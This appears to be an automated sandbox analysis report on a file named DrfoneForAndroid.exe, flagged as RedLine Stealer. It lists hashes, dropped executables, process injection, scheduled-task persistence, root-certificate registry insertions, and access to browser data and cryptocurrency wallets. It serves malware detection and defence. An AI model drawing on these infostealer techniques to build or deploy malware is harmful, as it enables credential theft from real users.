Analysis
-
max time kernel
104s -
max time network
132s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
17-04-2021 15:20
Static task
static1
Behavioral task
behavioral1
Sample
DrfoneForAndroid.exe
Resource
win10v20210410
Behavioral task
behavioral2
Sample
DrfoneForAndroid.exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
DrfoneForAndroid.exe
Resource
win10v20210408
Behavioral task
behavioral4
Sample
DrfoneForAndroid.exe
Resource
win10v20210410
Behavioral task
behavioral5
Sample
DrfoneForAndroid.exe
Resource
win7v20210408
General
-
Target
DrfoneForAndroid.exe
-
Size
117.0MB
-
MD5
d36de3e484b54d8d9864897dc93c42d5
-
SHA1
8669bfcce5a0aedc82232821cf37672645bdae3a
-
SHA256
b3be601b4902a1ba5c0754b2f67eaed42fc7bf7560de288c8a6e0401dc112595
-
SHA512
681bb7785d9847379baeb93e57f74ba188d13de312047e9c4689b96bb89f56814a02852c58f0fce45239f84b61bc10ff62ab18da7c9c9b10034482ccb5bd7a20
Malware Config
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Executes dropped EXE 22 IoCs
Processes:
DrfoneForAndroid.tmpdrfone-for-android_full1544.exedrfone-for-android_full1544.tmp7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exeiexplore.exeProcessKiller.exenvnodejslauncher.exenbdrivesllapi.exeNetFxLite.exeNetFxLite.tmpNFWCHk.exeMUIServices.exelibmfxsw32.exelibmfxsw32.exepid process 1776 DrfoneForAndroid.tmp 1452 drfone-for-android_full1544.exe 1908 drfone-for-android_full1544.tmp 1008 7z.exe 3780 7z.exe 1816 7z.exe 2564 7z.exe 2512 7z.exe 3892 7z.exe 3896 7z.exe 3672 7z.exe 4040 7z.exe 3808 iexplore.exe 1956 ProcessKiller.exe 1144 nvnodejslauncher.exe 2216 nbdrivesllapi.exe 2256 NetFxLite.exe 3724 NetFxLite.tmp 4092 NFWCHk.exe 3660 MUIServices.exe 1596 libmfxsw32.exe 2712 libmfxsw32.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\nvnodejslauncher.exe upx C:\Users\Admin\AppData\Local\Temp\nvnodejslauncher.exe upx -
Loads dropped DLL 45 IoCs
Processes:
DrfoneForAndroid.tmp7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exedrfone-for-android_full1544.tmpmscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exepid process 1776 DrfoneForAndroid.tmp 1008 7z.exe 3780 7z.exe 1816 7z.exe 2564 7z.exe 2512 7z.exe 3892 7z.exe 3896 7z.exe 3672 7z.exe 4040 7z.exe 1908 drfone-for-android_full1544.tmp 2720 mscorsvw.exe 2720 mscorsvw.exe 1008 mscorsvw.exe 1008 mscorsvw.exe 1296 mscorsvw.exe 1296 mscorsvw.exe 1552 mscorsvw.exe 1552 mscorsvw.exe 3708 mscorsvw.exe 3708 mscorsvw.exe 3476 mscorsvw.exe 3476 mscorsvw.exe 3776 mscorsvw.exe 3776 mscorsvw.exe 1780 mscorsvw.exe 1780 mscorsvw.exe 932 mscorsvw.exe 932 mscorsvw.exe 4092 mscorsvw.exe 4092 mscorsvw.exe 2196 mscorsvw.exe 2196 mscorsvw.exe 3708 mscorsvw.exe 3708 mscorsvw.exe 4052 mscorsvw.exe 4052 mscorsvw.exe 3112 mscorsvw.exe 3112 mscorsvw.exe 1828 mscorsvw.exe 1828 mscorsvw.exe 3772 mscorsvw.exe 3772 mscorsvw.exe 2316 mscorsvw.exe 2316 mscorsvw.exe -
Modifies file permissions 1 TTPs 3 IoCs
Processes:
icacls.exeicacls.exeicacls.exepid process 932 icacls.exe 3808 icacls.exe 3476 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
iexplore.exeMUIServices.exedescription pid process target process PID 3808 set thread context of 2220 3808 iexplore.exe regasm.exe PID 3660 set thread context of 2080 3660 MUIServices.exe explorer.exe -
Drops file in Program Files directory 64 IoCs
Processes:
drfone-for-android_full1544.tmpDrfoneForAndroid.tmpdescription ioc process File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\GIF\is-2OHLB.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\USBDebugGuide\Motorola\is-LHJNI.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\USBDebugGuide\Samsung\S8Series\is-E5D7M.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-NJ55H.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-TQU4Q.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-8F7TC.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-JIT55.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-JL272.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-383DP.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-PJDF4.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-UMTHE.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-4LE3B.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\is-3JVJD.tmp DrfoneForAndroid.tmp File opened for modification C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\AdbWinUsbApi.dll drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-7E0L8.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-5KVID.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-252CN.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-8B81T.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-K1KA9.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Template\SMS\image\is-5E5U5.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\is-KMEQQ.tmp drfone-for-android_full1544.tmp File opened for modification C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\WSAppHelper.exe drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-8VECQ.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-NDEKJ.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-9SV61.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-JCCD5.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-G6Q7R.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-CBA9U.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-DO909.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\Animations\is-BKN8S.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\USBDebugGuide\Htc\is-HP31H.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\USBDebugGuide\Xiaomi\Xiaomi\is-8PQFB.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-QVKBQ.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-FM9CQ.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-1ENEO.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-VC9E3.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-HJ1BK.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-82PQS.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-RLA80.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\is-L0A2H.tmp drfone-for-android_full1544.tmp File opened for modification C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\BaseConnection.dll drfone-for-android_full1544.tmp File opened for modification C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\VirtualFS.dll drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\is-SE1FG.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-022E7.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-M4BNG.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-DQQKE.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-BNOQI.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-V4KCP.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\WAF\Skin\Default\is-HG0MO.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\is-HNT09.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-03CCC.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-GBE8O.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-UGM7G.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-QUA6D.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-CGAGG.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-ASTNS.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-Q6SNK.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-RKMSO.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-QSAE3.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\media_pre\is-RNI97.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-2BNHF.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-KSNAQ.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-B6HDQ.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\Animations\is-25738.tmp drfone-for-android_full1544.tmp -
Drops file in Windows directory 64 IoCs
Processes:
ngen.exengen.exengen.exengen.exemscorsvw.exemscorsvw.exemscorsvw.exeNetFxLite.tmpmscorsvw.exemscorsvw.exemscorsvw.exengen.exemscorsvw.exengen.exemscorsvw.exemscorsvw.exengen.exengen.exemscorsvw.exengen.exengen.exengen.exemscorsvw.exemscorsvw.exemscorsvw.exengen.exemscorsvw.exengen.exemscorsvw.exedrfone-for-android_full1544.tmpdescription ioc process File created C:\Windows\Microsoft.NET\ngennicupdatelock.dat ngen.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.log ngen.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat ngen.exe File created C:\Windows\Microsoft.NET\ngenserviceclientlock.dat ngen.exe File created C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPC6DB.tmp\System.Messaging.dll mscorsvw.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.log ngen.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index16.dat mscorsvw.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index1a.dat mscorsvw.exe File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\regtlibv12.exe NetFxLite.tmp File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\indexc.dat mscorsvw.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\indexc.dat mscorsvw.exe File created C:\Windows\assembly\GACLock.dat mscorsvw.exe File created C:\Windows\Microsoft.NET\ngennicupdatelock.dat ngen.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\indexf.dat mscorsvw.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat ngen.exe File created C:\Windows\Microsoft.NET\ngennicupdatelock.dat ngen.exe File created C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPB111.tmp\System.Runtime.Serialization.Formatters.Soap.dll mscorsvw.exe File created C:\Windows\assembly\NativeImages_v2.0.50727_32\index1a.dat mscorsvw.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.log ngen.exe File created C:\Windows\Microsoft.NET\ngennicupdatelock.dat ngen.exe File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\installutil.exe.config NetFxLite.tmp File created C:\Windows\assembly\ngenlock.dat mscorsvw.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index1b.dat mscorsvw.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat ngen.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index15.dat mscorsvw.exe File created C:\Windows\assembly\GACLock.dat mscorsvw.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index18.dat mscorsvw.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v2.0.50727\regtlibv12.exe NetFxLite.tmp File created C:\Windows\Microsoft.NET\ngenserviceclientlock.dat ngen.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.log ngen.exe File created C:\Windows\Microsoft.NET\ngennicupdatelock.dat ngen.exe File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.lock ngen.exe File created C:\Windows\assembly\ngenlock.dat mscorsvw.exe File created C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPC44B.tmp\System.EnterpriseServices.dll mscorsvw.exe File created C:\Windows\assembly\NativeImages_v2.0.50727_32\indexd.dat mscorsvw.exe File created C:\Windows\assembly\GACLock.dat mscorsvw.exe File created C:\Windows\assembly\ngenlock.dat mscorsvw.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index17.dat mscorsvw.exe File created C:\Windows\Microsoft.NET\ngenserviceclientlock.dat ngen.exe File created C:\Windows\assembly\ngenlock.dat mscorsvw.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\indexd.dat mscorsvw.exe File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.lock ngen.exe File created C:\Windows\assembly\NativeImages_v2.0.50727_32\index16.dat mscorsvw.exe File created C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPC44B.tmp\System.EnterpriseServices.Wrapper.dll mscorsvw.exe File created C:\Windows\Microsoft.NET\ngenserviceclientlock.dat ngen.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index13.dat mscorsvw.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index16.dat mscorsvw.exe File created C:\Windows\assembly\ngenlock.dat mscorsvw.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat ngen.exe File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.lock ngen.exe File created C:\Windows\assembly\GACLock.dat mscorsvw.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec.exe.config NetFxLite.tmp File created C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP955B.tmp\System.Xml.dll mscorsvw.exe File created C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP9FEA.tmp\System.Data.SqlXml.dll mscorsvw.exe File created C:\Windows\assembly\GACLock.dat mscorsvw.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe.config NetFxLite.tmp File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index14.dat mscorsvw.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat ngen.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index11.dat mscorsvw.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index14.dat mscorsvw.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index16.dat mscorsvw.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index19.dat mscorsvw.exe File created C:\Windows\Microsoft.NET\ngenserviceclientlock.dat ngen.exe File created C:\Windows\Fonts\is-HBN7D.tmp drfone-for-android_full1544.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2232 schtasks.exe 1328 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2084 timeout.exe -
Modifies registry class 1 IoCs
Processes:
DrfoneForAndroid.tmpdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings DrfoneForAndroid.tmp -
Processes:
NFWCHk.exenvnodejslauncher.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2 NFWCHk.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2\Blob = 5c0000000100000004000000000400007e0000000100000008000000000010c51e92d201620000000100000020000000e7685634efacf69ace939a6b255b7b4fabef42935b50a265acb5cb6027e44e7009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030119000000010000001000000091161b894b117ecdc257628db460cc04030000000100000014000000742c3192e607e424eb4549542be1bbc53e6174e21d000000010000001000000027b3517667331ce2c1e74002b5ff2298140000000100000014000000e27f7bd877d5df9e0a3f9eb4cb0e2ea9efdb69770b000000010000004600000056006500720069005300690067006e00200043006c006100730073002000330020005000750062006c006900630020005000720069006d00610072007900200043004100000004000000010000001000000010fc635df6263e0df325be5f79cd67670f0000000100000010000000d7c63be0837dbabf881d4fbf5f986ad853000000010000002400000030223020060a2b0601040182375e010130123010060a2b0601040182373c0101030200c07a000000010000000e000000300c060a2b0601040182375e010268000000010000000800000000003db65bd9d5012000000001000000400200003082023c308201a5021070bae41d10d92934b638ca7b03ccbabf300d06092a864886f70d0101020500305f310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e31373035060355040b132e436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479301e170d3936303132393030303030305a170d3238303830313233353935395a305f310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e31373035060355040b132e436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f7269747930819f300d06092a864886f70d010101050003818d0030818902818100c95c599ef21b8a0114b410df0440dbe357af6a45408f840c0bd133d9d911cfee02581f25f72aa84405aaec031f787f9e93b99a00aa237dd6ac85a26345c77227ccf44cc67571d239ef4f42f075df0a90c68e206f980ff8ac235f702936a4c986e7b19a20cb53a585e73dbe7d9afe244533dc7615ed0fa271644c652e816845a70203010001300d06092a864886f70d010102050003818100bb4c122bcf2c26004f1413dda6fbfc0a11848cf3281c67922f7cb6c5fadff0e895bc1d8f6c2ca851cc73d8a4c053f04ed626c076015781925e21f1d1b1ffe7d02158cd6917e3441c9c194439895cdc9c000f568d0299eda290454ce4bb10a43df032030ef1cef8e8c9518ce6629fe69fc07db7729cc9363a6b9f4ea8ff640d64 NFWCHk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 nvnodejslauncher.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e nvnodejslauncher.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
DrfoneForAndroid.tmppowershell.exepowershell.exedrfone-for-android_full1544.tmpProcessKiller.exeregasm.exenbdrivesllapi.exeMUIServices.exepid process 1776 DrfoneForAndroid.tmp 1776 DrfoneForAndroid.tmp 1780 powershell.exe 1780 powershell.exe 1780 powershell.exe 3672 powershell.exe 3672 powershell.exe 3672 powershell.exe 1908 drfone-for-android_full1544.tmp 1908 drfone-for-android_full1544.tmp 1908 drfone-for-android_full1544.tmp 1908 drfone-for-android_full1544.tmp 1956 ProcessKiller.exe 2220 regasm.exe 2216 nbdrivesllapi.exe 3660 MUIServices.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
iexplore.exepid process 3808 iexplore.exe -
Suspicious use of AdjustPrivilegeToken 42 IoCs
Processes:
powershell.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exepowershell.exeProcessKiller.exeregasm.exenbdrivesllapi.exeMUIServices.exedescription pid process Token: SeDebugPrivilege 1780 powershell.exe Token: SeRestorePrivilege 1008 7z.exe Token: 35 1008 7z.exe Token: SeSecurityPrivilege 1008 7z.exe Token: SeSecurityPrivilege 1008 7z.exe Token: SeRestorePrivilege 3780 7z.exe Token: 35 3780 7z.exe Token: SeSecurityPrivilege 3780 7z.exe Token: SeSecurityPrivilege 3780 7z.exe Token: SeRestorePrivilege 1816 7z.exe Token: 35 1816 7z.exe Token: SeSecurityPrivilege 1816 7z.exe Token: SeSecurityPrivilege 1816 7z.exe Token: SeRestorePrivilege 2564 7z.exe Token: 35 2564 7z.exe Token: SeSecurityPrivilege 2564 7z.exe Token: SeSecurityPrivilege 2564 7z.exe Token: SeRestorePrivilege 2512 7z.exe Token: 35 2512 7z.exe Token: SeSecurityPrivilege 2512 7z.exe Token: SeSecurityPrivilege 2512 7z.exe Token: SeRestorePrivilege 3892 7z.exe Token: 35 3892 7z.exe Token: SeSecurityPrivilege 3892 7z.exe Token: SeSecurityPrivilege 3892 7z.exe Token: SeRestorePrivilege 3896 7z.exe Token: 35 3896 7z.exe Token: SeSecurityPrivilege 3896 7z.exe Token: SeSecurityPrivilege 3896 7z.exe Token: SeRestorePrivilege 3672 7z.exe Token: 35 3672 7z.exe Token: SeSecurityPrivilege 3672 7z.exe Token: SeSecurityPrivilege 3672 7z.exe Token: SeRestorePrivilege 4040 7z.exe Token: 35 4040 7z.exe Token: SeSecurityPrivilege 4040 7z.exe Token: SeSecurityPrivilege 4040 7z.exe Token: SeDebugPrivilege 3672 powershell.exe Token: SeDebugPrivilege 1956 ProcessKiller.exe Token: SeDebugPrivilege 2220 regasm.exe Token: SeDebugPrivilege 2216 nbdrivesllapi.exe Token: SeDebugPrivilege 3660 MUIServices.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
DrfoneForAndroid.tmpdrfone-for-android_full1544.tmppid process 1776 DrfoneForAndroid.tmp 1908 drfone-for-android_full1544.tmp -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
iexplore.exepid process 3808 iexplore.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
